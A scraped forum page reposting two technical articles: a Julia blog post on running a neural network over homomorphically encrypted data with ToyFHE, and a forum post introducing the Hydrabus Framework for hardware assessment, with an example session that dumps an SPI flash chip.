CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 1.0 + 0.0im 2.0 + 0.0im 3.0 + 0.0im 4.0 + 0.0im 5.0 + 0.0im 6.0 + 0.0im 7.0 + 0.0im 8.0 + 0.0im julia> c = encrypt(kp.pub, plain) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1099511627776,T} where T}) # And decrypt it again julia> decrypt(kp.priv, c) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 0.9999999999995506 - 2.7335193113350057e-16im 1.9999999999989408 - 3.885780586188048e-16im 3.000000000000205 + 1.6772825551165524e-16im 4.000000000000538 - 3.885780586188048e-16im 4.999999999998865 + 8.382500573679615e-17im 6.000000000000185 + 4.996003610813204e-16im 7.000000000001043 - 2.0024593503998215e-16im 8.000000000000673 + 4.996003610813204e-16im # Note that we had some noise. Let's go through all the primitive operations we'll need: julia> decrypt(kp.priv, c+c) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 1.9999999999991012 - 5.467038622670011e-16im 3.9999999999978817 - 7.771561172376096e-16im 6.00000000000041 + 3.354565110233105e-16im 8.000000000001076 - 7.771561172376096e-16im 9.99999999999773 + 1.676500114735923e-16im 12.00000000000037 + 9.992007221626409e-16im 14.000000000002085 - 4.004918700799643e-16im 16.000000000001346 + 9.992007221626409e-16im julia> csq = c*c CKKS ciphertext (length 3, encoding CKKSEncoding{FixedRational{1208925819614629174706176,T} where T}) julia> decrypt(kp.priv, csq) 8-element CKKSEncoding{FixedRational{1208925819614629174706176,T} where T} with indices 0:7: 0.9999999999991012 - 2.350516767363621e-15im 3.9999999999957616 - 5.773159728050814e-15im 9.000000000001226 - 2.534464540987068e-15im 16.000000000004306 - 2.220446049250313e-15im 24.99999999998865 + 2.0903753311370056e-15im 36.00000000000222 + 4.884981308350689e-15im 49.000000000014595 + 1.0182491378134327e-15im 64.00000000001077 + 4.884981308350689e-15im That was easy! The eagle eyed reader may have noticed that csq looks a bit different from the previous ciphertext. In particular, it is a “length 3” ciphertext and the scale is much larger. What these are and what they do is a bit too complicated for this point in the blog post, but suffice it to say, we want to get these back down before we do further computation, or we’ll run out of “space” in the ciphertext. Luckily, there is a way to do these for each of the two aspects that grew: # To get back down to length 2, we need to `keyswitch` (aka # relinerarize), which requires an evaluation key. Generating # this requires the private key. In a real application we would # have generated this up front and sent it along with the encrypted # data, but since we have the private key, we can just do it now. julia> ek = keygen(EvalMultKey, kp.priv) CKKS multiplication key julia> csq_length2 = keyswitch(ek, csq) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1208925819614629174706176,T} where T}) # Getting the scale back down is done using modswitching. julia> csq_smaller = modswitch(csq_length2) CKKS ciphertext (length 2, encoding CKKSEncoding{FixedRational{1.099511626783e12,T} where T}) # And it still decrypts correctly (though note we've lost some precision) julia> decrypt(kp.priv, csq_smaller) 8-element CKKSEncoding{FixedRational{1.099511626783e12,T} where T} with indices 0:7: 0.9999999999802469 - 5.005163520332181e-11im 3.9999999999957723 - 1.0468514951188039e-11im 8.999999999998249 - 4.7588542623100616e-12im 16.000000000023014 - 1.0413447889166631e-11im 24.999999999955193 - 6.187833723406491e-12im 36.000000000002345 + 1.860733715346631e-13im 49.00000000001647 - 1.442396043149794e-12im 63.999999999988695 - 1.0722489563648028e-10im Additionally, modswitching (short for modulus switching) reduces the size of the ciphertext modulus, so we can’t just keep doing this indefinitely. (In the terminology from above, we’re using a SHE scheme): julia> ℛ # Remember the ring we initially created ℤ₁₃₂₉₂₂₇₉₉₇₅₆₈₀₈₁₄₅₇₄₀₂₇₀₁₂₀₇₁₀₄₂₄₈₂₅₇/(x¹⁶ + 1) julia> ToyFHE.ring(csq_smaller) # It shrunk! ℤ₁₂₀₈₉₂₅₈₂₀₁₄₄₅₉₃₇₇₉₃₃₁₅₅₃/(x¹⁶ + 1) There’s one last operation we’ll need: rotations. Like keyswitching above, this requires an evaluation key (also called a galois key): julia> gk = keygen(GaloisKey, kp.priv; steps=2) CKKS galois key (element 25) julia> decrypt(circshift(c, gk)) decrypt(kp, circshift(c, gk)) 8-element CKKSEncoding{FixedRational{1099511627776,T} where T} with indices 0:7: 7.000000000001042 + 5.68459112632516e-16im 8.000000000000673 + 5.551115123125783e-17im 0.999999999999551 - 2.308655353580721e-16im 1.9999999999989408 + 2.7755575615628914e-16im 3.000000000000205 - 6.009767921608429e-16im 4.000000000000538 + 5.551115123125783e-17im 4.999999999998865 + 4.133860996136768e-17im 6.000000000000185 - 1.6653345369377348e-16im # And let's compare to doing the same on the plaintext julia> circshift(plain, 2) 8-element OffsetArray(::Array{Complex{Float64},1}, 0:7) with eltype Complex{Float64} with indices 0:7: 7.0 + 0.0im 8.0 + 0.0im 1.0 + 0.0im 2.0 + 0.0im 3.0 + 0.0im 4.0 + 0.0im 5.0 + 0.0im 6.0 + 0.0im Alright, we’ve covered the basic usage of the HE library. Before we get started thinking about how to perform neural network inference using these primitives, let’s look at and train the neural network we’ll be using. The machine learning model If you’re not familiar with machine learning, or the Flux.jl machine learning library, I’d recommend a quick detour to the Flux.jl documentation or our free Introduction to Machine Learning course on JuliaAcademy, since we’ll only be discussing the changes for running the model on encrypted data. Our starting point is the convolutional neural network example in the Flux model zoo. We’ll keep the training loop, data preparation, etc. the same and just tweak the model slightly. The model we’ll use is: function reshape_and_vcat(x) let y=reshape(x, 64, 4, size(x, 4)) vcat((y[:,i,:] for i=axes(y,2))...) end end model = Chain( # First convolution, operating upon a 28x28 image Conv((7, 7), 1=>4, stride=(3,3), x->x.^2), reshape_and_vcat, Dense(256, 64, x->x.^2), Dense(64, 10), ) This is essentially the same model as the one used in the paper “Secure Outsourced Matrix Computation and Application to Neural Networks”, which uses the same cryptographic scheme for the same demo, with two differences: 1) They also encrypt the model, which we neglect here for simplicity and 2) We have bias vectors after every layer (which is what Flux will do by default), which I’m not sure was the case for the model evaluated in the paper. Perhaps because of 2), the test set accuracy of our model is slightly higher (98.6% vs 98.1%), but this may of course also just come down to hyperparameter differences. An unusual feature (for those coming from a machine learning background) are the x.^2 activation functions. More common choices here would be something like tanh or relu or something fancier than that. However, while those functions (relu in particular) are cheap to evaluate on plaintext values, they would be quite expensive to evaluated encryptedly (we’d basically evaluate a polynomial approximation). Luckily x.^2 works fine our our purposes. The rest of the training loop is basically the same. The softmax was removed from the model in favor of a logitcrossentropy loss function (though of course we could have kept it and just evaluated the softmax after decryption on the client). The full code to train this model is on GitHub and completes in a few minutes on any recent GPU. Performing the operations efficiently Alright, now that we know what we need to do, let’s take stock of what operations we need to be able to do: Convolutions Elementwise Squaring Matrix Multiply Squaring is trivial, we already saw that above, so let’s tackle the other two in order. Throughout we’ll be assuming that we’re working with a batch size of 64 (you may note that the model parameters and batch size were strategically chosen to take good advantage of a 4096 element vector which is what we get from realistic parameter choices). Convolution Let us recall how convolution works. We take some window (in our case 7x7) of the original input array and for each element in the window multiply by an element of the convolution mask. Then we move the window over some (in our case, the stride is 3, so we move over by 3 elements) and repeat the process (with the same convolution mask). This process is illustrated in the following animation (source) for a 3x3 convolution with stride (2, 2) (the blue array is the input, the green array the output): Additionally, we have convolutions into 4 different “channels” (all this means is that we repeat the convolution 3 more times with different convolution masks). Alright, so now that we know what we’re doing let’s figure out how to do it. We’re in luck in that the convolution is the first thing in our model. As a result, we can do some preprocessing on the client before encrypting the data (without needing the model weights) to save us some work. In particular, we’ll do the following: Precompute each convolution window (i.e. 7x7 extraction from the original images), giving us 64 7x7 matrices per input image (note for 7x7 windows with stride 2 there are 8x8 convolution windows to evaluate per 28x28 input image) Collect the same position in each window into one vector, i.e. we’ll have a 64-element vector for each image or a 64x64 element vector for a batch of 64 (i.e. a total of 49 64x64 matrices) Encrypt that The convolution then simply becomes scalar multiplication of the whole matrix with the appropriate mask element, and by summing all 49 elements later, we the result of the convolution. An implementation of this strategy (on the plaintext) may look like: function public_preprocess(batch) ka = OffsetArray(0:7, 0:7) # Create feature extracted matrix I = [[batch[i′*3 .+ (1:7), j′*3 .+ (1:7), 1, k] for i′=ka, j′=ka] for k = 1:64] # Reshape into the ciphertext Iᵢⱼ = [[I[k][l...][i,j] for k=1:64, l=product(ka, ka)] for i=1:7, j=1:7] end Iᵢⱼ = public_preprocess(batch) # Evaluate the convolution weights = model.layers[1].weight conv_weights = reverse(reverse(weights, dims=1), dims=2) conved = [sum(Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4] conved = map(((x,b),)->x .+ b, zip(conved, model.layers[1].bias)) which (modulo a reordering of the dimension) gives the same answer as, but using operations model.layers[1](batch) Adding the encryption operations, we have: Iᵢⱼ = public_preprocess(batch) C_Iᵢⱼ = map(Iᵢⱼ) do Iij plain = CKKSEncoding{Tscale}(zero(plaintext_space(ckks_params))) plain .= OffsetArray(vec(Iij), 0:(N÷2-1)) encrypt(kp, plain) end weights = model.layers[1].weight conv_weights = reverse(reverse(weights, dims=1), dims=2) conved3 = [sum(C_Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4] conved2 = map(((x,b),)->x .+ b, zip(conved3, model.layers[1].bias)) conved1 = map(ToyFHE.modswitch, conved2) Note that a keyswitch isn’t required because the weights are public, so we didn’t expand the length of the ciphertext. Matrix multiply Moving on to matrix multiply, we take advantage of the fact that we can rotate elements in the vector to effect a re-ordering of the multiplication indices. In particular, consider a row-major ordering of matrix elements in the vector. Then, if we shift the vector by a multiple of the row-size, we get the effect of rotating the columns, which is a sufficient primitive for implementing matrix multiply (of square matrices at least). Let’s try it: function matmul_square_reordered(weights, x) sum(1:size(weights, 1)) do k # We rotate the columns of the LHS and take the diagonal weight_diag = diag(circshift(weights, (0,(k-1)))) # We rotate the rows of the RHS x_rotated = circshift(x, (k-1,0)) # We do an elementwise, broadcast multiply weight_diag .* x_rotated end end function matmul_reorderd(weights, x) sum(partition(1:256, 64)) do range matmul_square_reordered(weights[:, range], x[range, :]) end end fc1_weights = model.layers[3].W x = rand(Float64, 256, 64) @assert (fc1_weights*x) ≈ matmul_reorderd(fc1_weights, x) Of course for general matrix multiply, we may want something fancier, but it’ll do for now. Making it nicer At this point, we’ve managed to get everything together and indeed it works. For reference, here it is in all its glory (omitting setup for parameter selection and the like): ek = keygen(EvalMultKey, kp.priv) gk = keygen(GaloisKey, kp.priv; steps=64) Iᵢⱼ = public_preprocess(batch) C_Iᵢⱼ = map(Iᵢⱼ) do Iij plain = CKKSEncoding{Tscale}(zero(plaintext_space(ckks_params))) plain .= OffsetArray(vec(Iij), 0:(N÷2-1)) encrypt(kp, plain) end weights = model.layers[1].weight conv_weights = reverse(reverse(weights, dims=1), dims=2) conved3 = [sum(C_Iᵢⱼ[i,j]*conv_weights[i,j,1,channel] for i=1:7, j=1:7) for channel = 1:4] conved2 = map(((x,b),)->x .+ b, zip(conved3, model.layers[1].bias)) conved1 = map(ToyFHE.modswitch, conved2) Csqed1 = map(x->x*x, conved1) Csqed1 = map(x->keyswitch(ek, x), Csqed1) Csqed1 = map(ToyFHE.modswitch, Csqed1) function encrypted_matmul(gk, weights, x::ToyFHE.CipherText) result = repeat(diag(weights), inner=64).*x rotated = x for k = 2:64 rotated = ToyFHE.rotate(gk, rotated) result += repeat(diag(circshift(weights, (0,(k-1)))), inner=64) .* rotated end result end fq1_weights = model.layers[3].W Cfq1 = sum(enumerate(partition(1:256, 64))) do (i,range) encrypted_matmul(gk, fq1_weights[:, range], Csqed1[i]) end Cfq1 = Cfq1 .+ OffsetArray(repeat(model.layers[3].b, inner=64), 0:4095) Cfq1 = modswitch(Cfq1) Csqed2 = Cfq1*Cfq1 Csqed2 = keyswitch(ek, Csqed2) Csqed2 = modswitch(Csqed2) function naive_rectangular_matmul(gk, weights, x) @assert size(weights, 1) < size(weights, 2) weights = vcat(weights, zeros(eltype(weights), size(weights, 2)-size(weights, 1), size(weights, 2))) encrypted_matmul(gk, weights, x) end fq2_weights = model.layers[4].W Cresult = naive_rectangular_matmul(gk, fq2_weights, Csqed2) Cresult = Cresult .+ OffsetArray(repeat(vcat(model.layers[4].b, zeros(54)), inner=64), 0:4095) Not very pretty to look at, but hopefully if you have made it this far in the blog post, you should be able to understand each step in the sequence. Now, let’s turn our attention to thinking about some abstractions that would make all this easier. We’re now leaving the realm of cryptography and machine learning and arriving at programming language design, so let’s take advantage of fact that Julia allows powerful abstractions and go through the exercise of building some. For example, we could encapsulate the whole convolution extraction process as a custom array type: using BlockArrays """ ExplodedConvArray{T, Dims, Storage} <: AbstractArray{T, 4} Represents a an `nxmx1xb` array of images, but rearranged into a series of convolution windows. Evaluating a convolution compatible with `Dims` on this array is achievable through a sequence of scalar multiplications and sums on the underling storage. """ struct ExplodedConvArray{T, Dims, Storage} <: AbstractArray{T, 4} # sx*sy matrix of b*(dx*dy) matrices of extracted elements # where (sx, sy) = kernel_size(Dims) # (dx, dy) = output_size(DenseConvDims(...)) cdims::Dims x::Matrix{Storage} function ExplodedConvArray{T, Dims, Storage}(cdims::Dims, storage::Matrix{Storage}) where {T, Dims, Storage} @assert all(==(size(storage[1])), size.(storage)) new{T, Dims, Storage}(cdims, storage) end end Base.size(ex::ExplodedConvArray) = (NNlib.input_size(ex.cdims)..., 1, size(ex.x[1], 1)) function ExplodedConvArray{T}(cdims, batch::AbstractArray{T, 4}) where {T} x, y = NNlib.output_size(cdims) kx, ky = NNlib.kernel_size(cdims) stridex, stridey = NNlib.stride(cdims) kax = OffsetArray(0:x-1, 0:x-1) kay = OffsetArray(0:x-1, 0:x-1) I = [[batch[i′*stridex .+ (1:kx), j′*stridey .+ (1:ky), 1, k] for i′=kax, j′=kay] for k = 1:size(batch, 4)] Iᵢⱼ = [[I[k][l...][i,j] for k=1:size(batch, 4), l=product(kax, kay)] for (i,j) in product(1:kx, 1:ky)] ExplodedConvArray{T, typeof(cdims), eltype(Iᵢⱼ)}(cdims, Iᵢⱼ) end function NNlib.conv(x::ExplodedConvArray{<:Any, Dims}, weights::AbstractArray{<:Any, 4}, cdims::Dims) where {Dims<:ConvDims} blocks = reshape([ Base.ReshapedArray(sum(x.x[i,j]*weights[i,j,1,channel] for i=1:7, j=1:7), (NNlib.output_size(cdims)...,1,size(x, 4)), ()) for channel = 1:4 ],(1,1,4,1)) BlockArrays._BlockArray(blocks, BlockArrays.BlockSizes([8], [8], [1,1,1,1], [64])) end Note that here we made use BlockArrays back to represent a 8x8x4x64 array as 4 8x8x1x64 arrays as in the original code. Ok, so now we already have a much nicer representation of the first step, at least on unencrypted arrays: julia> cdims = DenseConvDims(batch, model.layers[1].weight; stride=(3,3), padding=(0,0,0,0), dilation=(1,1)) DenseConvDims: (28, 28, 1) * (7, 7) -> (8, 8, 4), stride: (3, 3) pad: (0, 0, 0, 0), dil: (1, 1), flip: false julia> a = ExplodedConvArray{eltype(batch)}(cdims, batch); julia> model(a) 10×64 Array{Float32,2}: [snip] How do we bring this into the encrypted world? Well, we need to do two things: We want to encrypt a struct (ExplodedConvArray) in such a way that each that we get a ciphertext for each field. Then, operations on this encrypted struct work by looking up what the function would have done on the original struct and simply doing the same homomorphically. We want to intercept certain operations to be done differently in the encrypted context. Luckily, Julia, provides an abstraction that lets us a do both: A compiler plugin-in using the Cassette.jl mechanism. How this works and how to use it is a bit of a complicated story, so I will omit it from this blog, post, but briefly, you can define a Context (say Encrypted and then define rules for how operations under this context work). For example, for the second requirement might be written, as: # Define Matrix multiplication between an array and an encrypted block array function (*::Encrypted{typeof(*)})(a::Array{T, 2}, b::Encrypted{<:BlockArray{T, 2}}) where {T} sum(a*b for (i,range) in enumerate(partition(1:size(a, 2), size(b.blocks[1], 1)))) end # Define Matrix multiplication between an array and an encrypted array function (*::Encrypted{typeof(*)})(a::Array{T, 2}, b::Encrypted{Array{T, 2}}) where {T} result = repeat(diag(a), inner=size(a, 1)).*x rotated = b for k = 2:size(a, 2) rotated = ToyFHE.rotate(GaloisKey(*), rotated) result += repeat(diag(circshift(a, (0,(k-1)))), inner=size(a, 1)) .* rotated end result end The end result of all of this that the user should be able to write the whole thing above with minimal manual work: kp = keygen(ckks_params) ek = keygen(EvalMultKey, kp.priv) gk = keygen(GaloisKey, kp.priv; steps=64) # Create evaluation context ctx = Encrypted(ek, gk) # Do public preprocessing batch = ExplodedConvArray{eltype(batch)}(cdims, batch); # Run on encrypted data under the encryption context Cresult = ctx(model)(encrypt(kp.pub, batch)) # Decrypt the answer decrypt(kp, Cresult) Of course, even that may not be optimal. The parameters of the cryptosystem (e.g. the ring ℛ, when to modswitch, keyswitch, etc) represent a tradeoff between precision of the answer, security and performance and depend strongly on the code being run. In general, one would want the compiler to analyze the code it’s about to run encrypted, suggest parameters for a given security level and desired precision and then generate the code with minimal manual work by the user. Conclusion Achieving the dream of automatically executing arbitrary computations securely is a tall order for any system, but Julia’s metaprogramming capabilities and friendly syntax make it well suited as a development platform. Some attempts at this have already been made by the RAMPARTS collaboration (paper, JuliaCon talk), which compiles simple Julia code to the PALISADE FHE library. Julia Computing is collaborating with the experts behind RAMPARTS on Verona, the recently announced next generation version of that system. Only in the past year or so has the performance of homomorphic encryption systems reached the point where it is possible to actually evaluate interesting computations at speed approaching practical usability. The floodgates are open. With new advances in algorithms, software and hardware, homomorphic encryption is sure to become a mainstream technology to protect the privacy of millions of users. If you would like to understand more deeply how everything works, I have tried to make sure that the ToyFHE repository is readable. There is also some documentation that I’m hoping gives a somewhat approachable introduction to the cryptography involved. Of course much work remains to be done. If you are interested in this kind of work or have interesting applications, do not hesitate to get in touch. Sursa: https://juliacomputing.com/blog/2019/11/22/encrypted-machine-learning.html
  24. Hydrabus Framework Hardware tool security tools hardware ghecko Oct 20 Hi Guys, Before diving into the main subject, I’m a security engineer and I’m fascinated by hardware security assessment. Since I play with some hardware tools like Bus Pirate and Hydrabus, I noticed that no tools bring together all the necessary scripts to interact with hardware protocols. Who has never been frustrated during a hardware security assessment facing a chip or a debug port exposed, and you don’t have the necessary script to dump it, find the baudrate of a UART port or properly communicate with it? That’s why I choose to develop a new framework for the awesome hardware tools Hydrabus 26 named (Hydrabus-Framework)[https://github.com/hydrabus-framework/framework 78]. It provides multiple modules allowing you to work efficiently and save time on any hardware project. This framework works like Metasploit, simply run hbfconsole, select a module using the use command, set the needed options with set and run it with the run command! It will also include a Miniterm to directly interact with the Hydrabus CLI. At the time of this writing, 3 modules are available. Modules hbfmodules.uart.baudrates This module allowing you to detect the baudrate of a UART target. It changes the UART baudrate automatically till finding the correct value. If it finds a valid baudrate, it prompts you to open a Miniterm session using the Hydrabus binary UART bridge. 99 hbfmodules.spi.chip_id The SPI chip_id module allows you to recover the ID of an SPI flash chip, useful to verify if the Hydrabus is correctly interfaced with the target or to identify the family of an unknown chip. It will be improved in the near future to print the manufacturer if finding and the chip name (Like flashrom) 9 hbfmodules.spi.dump_eeprom SPI dump_eeprom is used to dump an SPI flash. With this module, you can easily dump a flash memory and don’t waste your time writing a script to do this. You can rapidly jump to the analyze of the freshly dumped firmware! 15 More modules are coming soon! You can download the latest modules and update the framework by simply running the hbfupdate script. Architecture This framework has been developed with scalability in mind. Indeed, you can add modules without having to modify the framework’s core engine. Each module inherits from the abstract class AModule, providing a solid foundation to start coding your own module. Once the module is created and installed using python setup.py install, you can use it in the framework. Contributing To create a new module, open an issue on hbfmodules.skeleton, I will create a new repository initialized with the hbfmodules.skeleton repository, once you have provided the needed information. You can read more information to contribute to this project on the CONTRIBUTING.md file. Use case: Dumping an SPI flash chip. ghecko % hbfconsole _ ___ _______ _____ ____ _ _ _____ | | | \ \ / / __ \| __ \ /\ | _ \| | | |/ ____| | |__| |\ \_/ /| | | | |__) | / \ | |_) | | | | (___ | __ | \ / | | | | _ / / /\ \ | _ <| | | |\___ \ | | | | | | | |__| | | \ \ / ____ \| |_) | |__| |____) | |_|__|_|__|_| |_____/|_|__\_\/_/____\_\____/ \____/|_____/____ _ __ | ____| __ \ /\ | \/ | ____\ \ / / __ \| __ \| |/ / | |__ | |__) | / \ | \ / | |__ \ \ /\ / / | | | |__) | ' / | __| | _ / / /\ \ | |\/| | __| \ \/ \/ /| | | | _ /| < | | | | \ \ / ____ \| | | | |____ \ /\ / | |__| | | \ \| . \ |_| |_| \_\/_/ \_\_| |_|______| \/ \/ \____/|_| \_\_|\_\ [*] 3 modules loaded, run 'hbfupdate' command to install the latest modules [hbf] > use spi/dump_eeprom [hbf] spi(dump_eeprom)> show options Author: Jordan Ovrè Module name: dump SPI EEPROM, version 0.0.2 Description: Module to dump SPI EEPROM Name Value Required Description ------------ ------------ ---------- -------------------------------------------------------------------------- hydrabus /dev/ttyACM0 True Hydrabus device timeout 1 True Hydrabus read timeout dumpfile True The dump filename sectors 1024 True The number of sector (4096) to read. For example 1024 sector * 4096 = 4MiB start_sector 0 True The starting sector (1 sector = 4096 bytes) spi_device 1 True The hydrabus SPI device (1=SPI1 or 0=SPI2) spi_speed slow True set SPI speed (fast = 10.5MHz, slow = 320kHz, medium = 5MHz) spi_polarity 0 True set SPI polarity (1=high or 0=low) spi_phase 0 True set SPI phase (1=high or 0=low) [hbf] spi(dump_eeprom)> set dumpfile firmware.bin dumpfile ==> firmware.bin [hbf] spi(dump_eeprom)> set spi_speed medium spi_speed ==> medium [hbf] spi(dump_eeprom)> run [*] Starting to read chip... Reading 1024 sectors Dump 4.0MiB Readed: 4.0MiB [✔] Finished dumping to firmware.bin [*] Reset hydrabus to console mode [hbf] spi(dump_eeprom)> binwalk firmware.bin DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 134816 0x20EA0 Certificate in DER format (x509 v3), header length: 4, sequence length: 64 150864 0x24D50 U-Boot version string, "U-Boot 1.1.4 (Nov 26 2012 - 15:58:42)" 151232 0x24EC0 CRC32 polynomial table, big endian 160905 0x27489 Copyright string: "copyright." 262208 0x40040 LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 2465316 bytes 1114112 0x110000 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2676149 bytes, 1117 inodes, blocksize: 131072 bytes, created: 2013-11-12 09:49:10 3801091 0x3A0003 POSIX tar archive (GNU), owner user name: "_table.tar.gz" You can find the tools and more details on the official github repository: hydrabus-framework 78 Ghecko. Sursa: https://0x00sec.org/t/hydrabus-framework/17057
×
×
  • Create New...